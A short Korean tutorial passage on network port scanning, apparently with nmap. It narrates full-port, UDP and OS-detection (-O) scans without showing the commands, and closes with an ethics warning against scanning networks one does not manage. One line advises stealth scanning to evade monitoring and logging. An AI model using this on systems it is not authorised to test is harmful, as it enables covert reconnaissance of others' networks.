지정된 포트가 아니라 대상호스트의 열린 포트를 모두 검색해 봅니다.

대상 호스트의 열린 포트를 알수는 있지만 로그가 남으므로 위험합니다.
스텔스 스캔으로 감시를 피해야 겠지요.

UDP port 스캔입니다. 시간이 많이 걸릴 수도 있습니다.

이번에는 -O 옵션으로 운영체제를 알아보겠습니다.

몇가지 예를 통해 사용법을 알아 보았습니다.

마지막을 부탁드릴 말씀은 자신이 직접 관리하지 않는, 호스트나 네트웍에서 테스트를 하는 것은
아주 무례한 행동이며, 관리가 엄격한 사이트의 경우 접속 제한은 당하는 경우도 있으므로
바람직하지 않은 방법으로 사용하는 일이 없길 바랍니다.